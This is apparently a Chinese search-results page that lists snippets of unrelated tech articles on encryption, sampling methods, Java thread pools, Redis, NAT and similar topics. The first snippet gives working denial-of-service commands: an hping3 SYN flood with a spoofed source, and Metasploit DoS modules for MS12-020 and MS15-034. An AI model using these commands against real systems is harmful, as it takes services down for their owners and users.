精华内容
下载资源
问答
  • 常用的几种拒绝方法有
    千次阅读
    2020-12-14 19:36:29

    1.使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接,伪造源地址为192.168.10.99,并使用1000微秒的间隔发送各个SYN包

    hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
    

    2.MS12-020

    msfconsole
    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    set RHOST ip
    set LHOST ip
    exploit
    
    

    3.MS15-034

    use auxiliary/dos/http/ms15_034_ulonglongadd 
    
    set rhosts ip
    
    set threads 10
    
    run
    
    更多相关内容
  • 电脑常见几种加密方法

    千次阅读 2021-07-25 08:31:34
    那么,电脑常见几种加密方法有哪些呢?下面jy135小编为大家整理了电脑常见的加密方法,希望能为大家提供帮助!电脑常见几种加密的方法一、电脑加密你是否希望在你不在的时候你的电脑不被别人私自用呢?解...

    电脑常见的几种加密方法

    加密可以用于保证安全性, 但是其它一些技术在保障通信安全方面仍然是必须的,尤其是关于数据完整性和信息验证;例如,信息验证码(MAC)或者数字签名。另一方面的考虑是为了应付流量分析。那么,电脑常见的几种加密方法有哪些呢?下面jy135小编为大家整理了电脑常见的加密方法,希望能为大家提供帮助!

    e4e706f9589c570f2d637f1503d34c2f.png

    电脑常见的几种加密的方法

    一、电脑加密

    你是否希望在你不在的时候你的电脑不被别人私自用呢?解决这个最好的办法就是对电脑进行加密。电脑加密也有几种方式,一是电脑开机是就出来输入密码提示。这个加密需要在电脑BIOS里面设置,方法是在BIOS中“Bios features setup”中这一项设置为“System”。改了这一项设置的BIOS密码才有效果。

    然后将“User password”设置上密码就可以了。重新开机在进入Windows前会要求你输入刚才设置的密码了。 二是用户进入电脑系统的时候出来用户登入窗口,方法是打开电脑控制面板,选择用户账户然后选择用户对其进行加密。

    二、加密文件或文件夹

    步骤一:打开Windows资源管理器。

    步骤二:右键单击要加密的文件或文件夹,然后单击“属性”。

    步骤三:在“常规”选项卡上,单击“高级”。选中“加密内容以便保护数据”复选框

    在加密过程中还要注意以下五点:

    1、要打开“Windows 资源管理器”,请单击“开始→程序→附件”,然后单击“Windows 资源管理器”。

    2、只可以加密NTFS分区卷上的文件和文件夹,FAT分区卷上的文件和文件夹无效。

    3、被压缩的文件或文件夹也可以加密。如果要加密一个压缩文件或文件夹,则该文件或文件夹将会被解压。

    4、无法加密标记为“系统”属性的文件,并且位于systemroot目录结构中的文件也无法加密。

    5、在加密文件夹时,系统将询问是否要同时加密它的子文件夹。如果选择是,那它的子文件夹也会被加密,以后所有添加进文件夹中的文件和子文件夹都将在添加时自动加密。

    三、解密文件或文件夹

    步骤一:打开Windows资源管理器。

    步骤二:右键单击加密文件或文件夹,然后单击“属性”。

    步骤三:在“常规”选项卡上,单击“高级”。

    步骤四:清除“加密内容以便保护数据”复选框。

    同样,我们在使用解密过程中要注意以下问题:

    1、要打开“Windows资源管理器”,请单击“开始→程序→附件”,然后单击“Windows资源管理器”。

    2、在对文件夹解密时,系统将询问是否要同时将文件夹内的所有文件和子文件夹解密。如果选择仅解密文件夹,则在要解密文件夹中的加密文件和子文件夹仍保持加密。但是,在已解密文件夹内创立的新文件和文件夹将不会被自动加密。

    以上就是使用文件加、解密的方法!而在使用过程中我们也许会遇到以下一些问题,在此作以下说明:

    1、高级按钮不能用

    原因:加密文件系统(EFS)只能处理NTFS文件系统卷上的文件和文件夹。如果试图加密的文件或文件夹在FAT或FAT32卷上,则高级按钮不会出现在该文件或文件夹的属性中。

    解决方案:

    将卷转换成带转换实用程序的NTFS卷。

    打开命令提示符。

    键入:Convert [drive]/fs:ntfs

    (drive 是目标驱动器的驱动器号)

    2、当打开加密文件时,显示“拒绝访问”消息

    原因:加密文件系统(EFS)使用公钥证书对文件加密,与该证书相关的私钥在本计算机上不可用。

    解决方案:

    查找合适的证书的'私钥,并使用证书管理单元将私钥导入计算机并在本机上使用。

    3、用户基于NTFS对文件加密,重装系统后加密文件无法被访问的问题的解决方案(注意:重装Win2000/XP前一定要备份加密用户的证书):

    步骤一:以加密用户登录计算机。

    步骤二:单击“开始→运行”,键入“mmc”,然后单击“确定”。

    步骤三:在“控制台”菜单上,单击“添加/删除管理单元”,然后单击“添加”。

    步骤四:在“单独管理单元”下,单击“证书”,然后单击“添加”。

    步骤五:单击“我的用户账户”,然后单击“完成”

    步骤六:单击“关闭”,然后单击“确定”。

    步骤七:双击“证书——当前用户”,双击“个人”,然后双击“证书”。

    步骤八:单击“预期目的”栏中显示“加密文件”字样的证书。

    步骤九:右键单击该证书,指向“所有任务”,然后单击“导出”。

    步骤十:按照证书导出向导的指示将证书及相关的私钥以PFX文件格式导出(注意:推荐使用“导出私钥”方式导出,这样可以保证证书受密码保护,以防别人盗用。另外,证书只能保存到你有读写权限的目录下)。

    4、保存好证书

    注意将PFX文件保存好。以后重装系统之后无论在哪个用户下只要双击这个证书文件,导入这个私人证书就可以访问NTFS系统下由该证书的原用户加密的文件夹(注意:使用备份恢复功能备份的NTFS分区上的加密文件夹是不能恢复到非NTFS分区的)。

    最后要提一下,这个证书还可以实现下述用途:

    (1)给予不同用户访问加密文件夹的权限

    将我的证书按“导出私钥”方式导出,将该证书发给需要访问这个文件夹的本机其他用户。然后由他登录,导入该证书,实现对这个文件夹的访问。

    (2)在其也WinXP机器上对用“备份恢复”程序备份的以前的加密文件夹的恢复访问权限

    将加密文件夹用“备份恢复”程序备份,然后把生成的Backup、bkf连同这个证书拷贝到另外一台WinXP机器上,用“备份恢复”程序将它恢复出来(注意:只能恢复到NTFS分区)。然后导入证书,即可访问恢复出来的文件了。

    【电脑常见的几种加密方法】相关文章:

    展开全文
  • 几种采样方法

    千次阅读 2020-03-26 17:35:22
    采样的几种方法拒绝采样蒙特卡罗法采样Metropolis-Hastings算法 采样是指通过模拟的方式来采集符合某个分布p(x)p(x)p(x)的一些样本,一般来说,要采集的分布比较复杂。 拒绝采样 拒绝采样,也叫接受-拒绝采样。...


    采样是指通过模拟的方式来采集符合某个分布 p ( x ) p(x) p(x)的一些样本,一般来说,要采集的分布比较复杂。

    拒绝采样

    拒绝采样,也叫接受-拒绝采样。顾名思义,在采样过程中,我们会接受一些样本,也会拒绝一些样本,使得样本最终的分布符合期望。

    假设原始分布 p ( x ) p(x) p(x)难以直接采样,我们先将 p ( x ) p(x) p(x)归一化,得到 p ^ ( x ) \hat{p}(x) p^(x)。然后引入一个比较容易采样的分布 q ( x ) q(x) q(x)和一个常数 k k k,使得 k q ( x ) kq(x) kq(x)可以覆盖 p ^ ( x ) \hat{p}(x) p^(x),即 k q ( x ) > p ^ ( x ) kq(x)>\hat{p}(x) kq(x)>p^(x) q ( x ) q(x) q(x)为提议分布。

    比如我们要采集一个分布 p ( x ) = 1 2 1 2 π σ exp ⁡ − ( x − 0.3 ) 2 2 σ 2 + 3 2 1 2 π σ exp ⁡ − − ( x − 0.8 ) 2 2 σ 2 p(x)=\frac{1}{2}\frac{1}{\sqrt{2\pi\sigma}}\exp{-\frac{(x-0.3)^2}{2\sigma^2}}+\frac{3}{2}\frac{1}{\sqrt{2\pi\sigma}}\exp{-\frac{-(x-0.8)^2}{2\sigma^2}} p(x)=212πσ 1exp2σ2(x0.3)2+232πσ 1exp2σ2(x0.8)2,其归一化后多了一个系数 1 0.632455 \frac{1}{0.632455} 0.6324551。我们选择正态分布 q ( x ) = 1 2 π σ exp ⁡ − ( x − 0.6 ) 2 2 ∗ 0. 4 2 q(x)=\frac{1}{\sqrt{2\pi\sigma}}\exp{-\frac{(x-0.6)^2}{2*0.4^2}} q(x)=2πσ 1exp20.42(x0.6)2为提议分布, k k k取为10。如下图所示:
    在这里插入图片描述
    观测 p ^ ( x ) \hat{p}(x) p^(x)的分布,我们在0到1.2之间根据提议分布抽取样本 x ^ \hat{x} x^,计算 α ( x ^ ) = p ^ ( x ^ ) k q ( x ^ ) \alpha(\hat{x})=\frac{\hat{p}(\hat{x})}{kq(\hat{x})} α(x^)=kq(x^)p^(x^),并以 α ( x ^ ) \alpha(\hat{x}) α(x^)的概率接受这个样本。

    def normal(x,u,sigma):
      p=np.exp(-(x-u)**2/(2*sigma**2))/(np.sqrt(2*np.pi)*sigma)
      return p
      
    def f1(x):
      sigma=0.1  
      return (0.5/np.sqrt(2*np.pi*sigma)*np.exp(-(x-0.3)**2/2.0/sigma**2)+1.5/np.sqrt(2.0*np.pi*sigma)*np.exp(-(x-0.8)**2/2.0/sigma**2))/0.632455
      
    x_t=[0]
    for t in range(100000):
      
      x_=np.random.normal(0.6,0.4)
      alpha=f1(x_)/5/normal(x_,0.6,0.4)
      u=np.random.uniform(0,1)
      if u<alpha:
        x_t.append(x_)
    

    最终采样结果如下:
    在这里插入图片描述

    拒绝采样法的难点在于:如何找到合适的提议分布,尤其是当样本维度很高的时候。

    蒙特卡罗法采样

    在高维空间中,蒙特卡罗法是一种更好的采样方法。其核心思想是将采样过程看作一个马尔可夫链。 x 1 , x 2 , . . . , x t − 1 , x t , x t + 1 , . . . x_1, x_2, ..., x_{t-1}, x_t, x_{t+1}, ... x1,x2,...,xt1,xt,xt+1,....
    t + 1 t+1 t+1次的采样依赖于第 t t t次抽取的样本 x t x_t xt和状态转移分布 q ( x ∣ x t ) q(x|x_t) q(xxt)。如果这个马尔可夫链的平稳分布为 p ( x ) p(x) p(x),那么在状态平稳时抽取的样本就服从 p ( x ) p(x) p(x)的分布。

    Metropolis-Hastings算法

    Metropolis-Hastings算法简称MH算法,是一种常用的蒙特卡罗采样法。

    在MH算法中,假设第 t t t次采样的样本为 x t x_t xt,首先根据提议分布 q ( x ∣ x t ) q(x|x_t) q(xxt)抽取一个样本 x ^ \hat{x} x^,并以概率 A ( x ^ , x t ) A(\hat{x},x_t) A(x^,xt)来接受 x ^ \hat{x} x^作为第 t + 1 t+1 t+1次的采样样本 x t + 1 x_{t+1} xt+1
    A ( x ^ , x t ) = min ( 1 , p ( x ^ ) q ( x t ∣ x ^ ) p ( x t ) q ( x ^ ∣ x t ) ) A(\hat{x},x_t)=\text{min}(1,\frac{p(\hat{x})q(x_t|\hat{x})}{p(x_t)q(\hat{x}|x_t)}) A(x^,xt)=min(1,p(xt)q(x^xt)p(x^)q(xtx^))
    这里相当于对马尔可夫链的状态转移概率做了修正: q ′ ( x ^ ∣ x t ) = q ( x ^ ∣ x t ) A ( x ^ , x t ) q'(\hat{x}|x_t)=q(\hat{x}|x_t)A(\hat{x},x_t) q(x^xt)=q(x^xt)A(x^,xt)
    修正后的马尔可夫链可达平稳状态,且平稳分布为 p ( x ) p(x) p(x)
    其证明可以参考:《神经网络与深度学习》,邱锡鹏,2019 中关于采样的章节。

    我们在接受-拒绝采样中举的例子,也可以用MH方法来进行采样。

    ################ M-H sampling
    x_m=[0]
    for t in range(200000):
      x_=np.random.normal(x_m[-1],0.1)
    #  alpha=f1(x_)*normal(x_,x_m[-1],0.1)/f1(x_m[-1])/normal(x_m[-1],x_,0.1)
      alpha=f1(x_)*normal(x_m[-1],x_,0.1)/f1(x_m[-1])/normal(x_,x_m[-1],0.1)
    #  print(normal(x_m[-1],x_,1)/normal(x_,x_m[-1],1))
      alpha=min(alpha,1)
      u=np.random.uniform(0,1)
      if u<alpha:
        x_m.append(x_)
    

    结果如下:
    在这里插入图片描述

    展开全文
  • 创建线程池几种方式

    万次阅读 2020-05-04 22:15:27
    创建线程池几种方式一、Executors二、ThreadPoolExecutor 一、Executors Executors是一个线程相关的工具类。主要提供了以下几种创建线程池的方法: index method corePoolSize maximumPoolSize ...

    一、Executors

    Executors是一个线程相关的工具类。主要提供了以下几种创建线程池的方法:

    indexmethodcorePoolSizemaximumPoolSizekeepAliveTimeunitworkQueue
    1newCachedThreadPool0Integer.MAX_VALUE60LTimeUnit.SECONDSSynchronousQueue
    2newFixedThreadPool自定义与corePoolSize相同0LTimeUnit.MILLISECONDSLinkedBlockingQueue
    3newSingleThreadExecutor110LTimeUnit.MILLISECONDSLinkedBlockingQueue
    4newScheduledThreadPool自定义Integer.MAX_VALUE0NANOSECONDSDelayedWorkQueue
    5newSingleThreadScheduledExecutor1Integer.MAX_VALUE0NANOSECONDSDelayedWorkQueue

    第1,4,5种:线程最大数量是Integer.MAX_VALUE,当执行大量耗时任务时,容易造成堆外内存溢出
    第2,3种:使用的的阻塞队列为无边界队列,当任务量过大时,可能会导致内存溢出

    注意: 在java8中新添加了newWorkStealingPool

    二、ThreadPoolExecutor

    ThreadPoolExecutor(int corePoolSize, //核心线程数量
                       int maximumPoolSize, // 最大线程数量
                       long keepAliveTime, // 存活时间 
                       TimeUnit unit, // 时间单位
                       BlockingQueue<Runnable> workQueue, //阻塞队列
                       ThreadFactory threadFactory) // 拒绝策略
    

    注意: 有多于corePoolSize但小于maximumPoolSize线程正在运行,则仅当队列已满时才会创建新线程

    在这里插入图片描述

    展开全文
  • 看到耗子叔这篇对于分布式事务处理的几种方式写的很清晰,原文:https://coolshell.cn/articles/10910.html 当我们在生产线上用一台服务器来提供数据服务的时候,我会遇到如下的两个问题: 1)一台服务器的性能不...
  • PostgreSQL的几种常见问题和解决方法

    千次阅读 2021-08-19 10:27:13
    PostgreSQL的几种常见问题和解决方法 ** 1. 前言 1.1 概述 本文介绍了postgresql的几种常见问题,并从现象出发,逐步排查问题,分析导致问题的原因并给出解决方案。 本文介绍的问题分为两大类:一类是关于...
  • 统计学——几种常见的假设检验

    千次阅读 2020-04-22 17:50:37
    1、什么是假设检验? 假设检验(hypothesis testing),又称统计假设检验,是用来判断样本与样本、样本与总体的差异是由抽样误差引起还是本质差别造成的统计推断...常用的假设检验方法有Z检验、t检验、卡方检验、F检...
  • 常见几种拒绝服务类攻击(DoS)

    万次阅读 2017-09-18 19:03:57
    要理解DoS攻击的实现原理,必须要对TCP一定了解。1.何为DoS?DoS(Denial of Service)的含义即让目标机器停止提供服务或资源访问。相当于在某家店客满的时候,不再接受更多的客人...在常见的TCP/IP通信中,IP层不保
  • java常用几种线程池比较

    千次阅读 2017-09-06 00:09:25
    java常用几种线程池比较
  • 几种采样方法总结

    千次阅读 2017-08-14 11:05:07
    一般遇到这种情况,人们经常会采用一些方法去得到近似解(越逼近精确解越好,当然如果一个近似算法与精确解的接近程度能够通过一个式子来衡量或者上下界,那么这种近似算法比较好,因为人们可以知道接近程度,换个...
  • 首先呢简单介绍一下目前常见几种网络攻击: XSS攻击、SQL注入、CSRF攻击、上传文件攻击、DDos攻击 XSS攻击:Cross Site Script跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意的html+javascript的脚本
  • 在java中异步线程很重要,比如在业务流处理时,需要通知硬件设备,发短信...线程的操作,是java中最重要的部分之一,实现线程操作也很多种方法,这里仅介绍几种常用的。在springboot框架中,可以使用注解简单实现线
  • 防止常见几种网络攻击的方法

    千次阅读 2018-05-22 21:16:07
    这种方法也是使用 token 并进行验证,和上一种方法不同的是,这里并不是把 token 以参数的形式置于 HTTP 请求之中,而是把它放到 HTTP 头中自定义的属性里。通过 XMLHttpRequest 这个类,可以一次性给所有该类...
  • 常用几种线程池以及使用的场景

    千次阅读 2018-03-01 21:05:00
    通俗:创建一个固定大小的线程池,线程池内线程存活时间无限制,线程池可以支持定时及周期性任务执行,如果所有线程均处于繁忙状态,对于新任务会进入DelayedWorkQueue队列中,这是一按照超时时间排序的队列结构 ...
  • 几种常见的线程池及使用场景

    万次阅读 2020-03-08 19:54:58
    创建线程和销毁线程的花销是比较大的,这些时间可能比处理业务的时间还要长。这样频繁的创建线程和销毁线程,再加上业务工作线程,消耗系统资源的时间,可能导致系统资源不足。(我们可以把创建和销毁的线程的过程...
  • redis存储的几种方式

    千次阅读 2019-11-15 10:09:28
    一、redis的数据是存在内存里吗? 首先要明白redis是一个数据库 redis是一个内存数据库, 所有数据基本上都存在于内存当中, 会定时以追加或者快照的方式刷新到硬盘中....Redis最为常用的数据类型主要以下:...
  • Linux中常见几种错误和解决方法

    千次阅读 2019-06-22 15:52:10
    1、Linux中常见的错误: ping: unknown host:主机找不到错误 timeout:请求超时 permission denied: 权限被拒绝 Connection refused:连接拒绝 2、四种常见错误的解决方法: .当提示ping: unknown host...
  • 线程的几种创建方式

    千次阅读 2022-03-01 15:03:28
    今天突然用到线程池,就复习下线程这块,记录下工作中常用的知识
  • 前端常见几种报错code码

    千次阅读 2021-10-22 14:59:15
    前端常见几种报错code码 switch (err.response.status) { case 400: err.message = '请求无效,请检查参数是否正确!' break case 401: err.message = '未经授权,访问被拒!' break case 403: err....
  • 近年常用几种DDOS攻击检测方法

    千次阅读 2018-01-29 01:22:00
    1.基于组合分类器的ddos攻击流量分布式检测模型本研究提出了一分布式攻击流量检测模型,该模型的核心检测部分采用的是机器学习中应用非常广泛的集成学习方法,即组合分类器的随机森林方法。该方法拓展性好,能够...
  • 多重共线性问题的几种解决方法

    万次阅读 多人点赞 2018-01-28 16:45:51
    主成分分析作为多元统计分析的一种常用方法在处理多变量问题时具有其一定的优越性,其降维的优势是明显的,主成分回归方法对于一般的多重共线性 问题还是适用的,尤其是对共线性较强的变量之间。 6、偏最小...
  • Linux 禁止某个IP地址访问的几种方法

    万次阅读 2018-09-26 12:55:21
    三个方法: 1、把它加到/etc/rc.local中 2、vi /etc/sysconfig/iptables可以把你当前的iptables规则放到/etc/sysconfig/iptables中,系统启动iptables时自动执行。 3、service iptables save 也可以把你当前...
  • 实现多线程的几种方式

    千次阅读 2021-10-14 18:00:36
    2:重写run()方法 3:在测试类中创建ThreadDemo类的对象 4:启动线程 ThreadDemo类 public class ThreadDemo extends Thread { @Override public void run() { for (int i = 0; i <100 ; i++) { System.out....
  • NAT的几种类型

    千次阅读 2021-01-26 22:31:23
    网络地址转换),当在专用网内部的一些主机本来已经分配到了本地IP地址(即仅在本专用网内使用的专用地址),但现在又想和因特网上的主机通信(并不需要加密)时,可使用NAT方法。 要真正了解NAT就必须先了解现在IP...
  • 常见重构方法大汇总

    千次阅读 2020-09-25 19:42:27
    一般重构方法 使用模式重构 重复代码 提炼方法 提取类 方法上移 替换算法 链构造方法 构造Template Method 以Composite取代一/多之分引入Null Object...
  • 几种常用的优化方法

    万次阅读 2015-06-17 15:10:09
    熟悉机器学习的童鞋都知道,优化方法是其中一个非常重要的话题,最常见的情形就是利用目标函数的导数通过多次迭代来求解无约束最优化问题。实现简单,coding 方便,是训练模型的必备利器之一。   2. 个数学...
  • 拒绝推断

    千次阅读 2019-03-14 18:15:38
    拒绝推断 转载自微信号bigdatafengkong ... 在做申请评分卡时,所使用的数据是审批接受的已知好坏...的问题,因为接受样本只是申请样本的一部分,此评分没有考虑拒绝样本的信息,在对总体申请进行评估时会偏差。如...
  • 几种数据获取方法

    千次阅读 2017-08-10 17:38:51
    特别是想要对一个新的领域进行研究和探索,拥有这个领域的数据那都是十分重要的意义的。在这里给大家推荐一些能够用上数据获取方式,了这些资源,不仅可以在数据收集的效率上能够得到很大的提升,同时也可以学习...
  • 几种常用的优化方法 1. 前言 熟悉机器学习的童鞋都知道,优化方法是其中一个非常重要的话题,最常见的情形就是利用目标函数的导数通过多次迭代来求解无约束最优化问题。实现简单,coding 方便,是训练模型的...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 139,011
精华内容 55,604
热门标签
关键字:

常用的几种拒绝方法有